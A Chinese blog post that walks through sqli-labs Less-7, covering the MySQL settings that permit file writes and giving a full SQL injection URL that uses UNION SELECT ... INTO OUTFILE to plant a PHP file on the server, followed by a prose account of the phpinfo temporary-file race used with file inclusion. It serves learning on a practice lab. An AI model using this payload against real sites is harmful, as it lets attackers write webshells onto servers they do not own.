文件上传漏洞——sqli-labs第7关

Myth丶恋晨 2023-03-02 07:59 66阅读 0赞

### 目录 ###

*   *   *  条件：
         *   *  复现
             *  phpinfo文件上传漏洞

### 条件： ###

1.已知对应站点的绝对路径  
2.`File_priv`开关需要是打开状态

select file_priv from mysql.user;

![在这里插入图片描述][2020072815123735.png]  
3.secure\_file\_priv 不为null

*  设置为空，对所有路径均可进行导入导出。
 *  设置为一个目录名字，只允许在该路径下导入导出。
 *  设置为Null，禁止所有导入导出。

`默认是NULL，可以通过my.conf文件mysqld一栏里进行配置，配置完成后，重启便会生效。`  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70]  
在末尾加上：`secure_file_priv=`

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70 1]

`select @@global.secure_file_priv;`  
但是改完之后，显示的值还是null  
![在这里插入图片描述][20200728151926809.png]

#### 复现 ####

后面就是文件上传了

`SELECT “123” INTO OUTFILE “c:/123.txt";`

要使用联合查询写文件，不能使用and或者or拼接写文件

http://172.16.11.222/sqli-labs/Less-7/?id=-1')) union select 1,2,"<?php phpinfo();?>" into outfile "C:/cmd.php" --+

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70 2]上传成功  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70 3]

#### phpinfo文件上传漏洞 ####

在给PHP发送POST数据包时，如果数据包里包含文件区块，无论访问的代码中是否有处理文件上传的逻辑，php都会将这个文件保存成一个临时文件（通常是/tmp/php\[6个随机字符\]），这个临时文件在请求结束后就会被删除，同时，phpinfo页面会将当前请求上下文中所有变量都打印出来。但是文件包含漏洞和phpinfo页面通常是两个页面，理论上我们需要先发送数据包给phpinfo页面，然后从返回页面中匹配出临时文件名，将这个文件名发送给文件包含漏洞页面。

因为在第一个请求结束时，临时文件就会被删除，第二个请求就无法进行包含。

但是这并不代表我们没有办法去利用这点上传恶意文件，只要发送足够多的数据，让页面还未反应过来，就上传我们的恶意文件，然后文件包含.

关于利用phpinfo文件上传：[https://www.adminxe.com/1083.html][https_www.adminxe.com_1083.html]

[2020072815123735.png]: /images/20230208/4b5cef86fd4c4981bffb5cb85f8c2e6c.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70]: /images/20230208/f421d35ccdce47d69269fa6ed6c79423.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70 1]: /images/20230208/9642da4bf15c408fa04c5c98a6cd7188.png
[20200728151926809.png]: /images/20230208/8a94ab59a8bf44808cad1ad97556966b.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70 2]: /images/20230208/39a74eb5a4a04056bbac2c3038dbdd2e.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTY2MzkwNQ_size_16_color_FFFFFF_t_70 3]: /images/20230208/2b79c781068d454e805c4b3b750060f0.png
[https_www.adminxe.com_1083.html]: https://www.adminxe.com/1083.html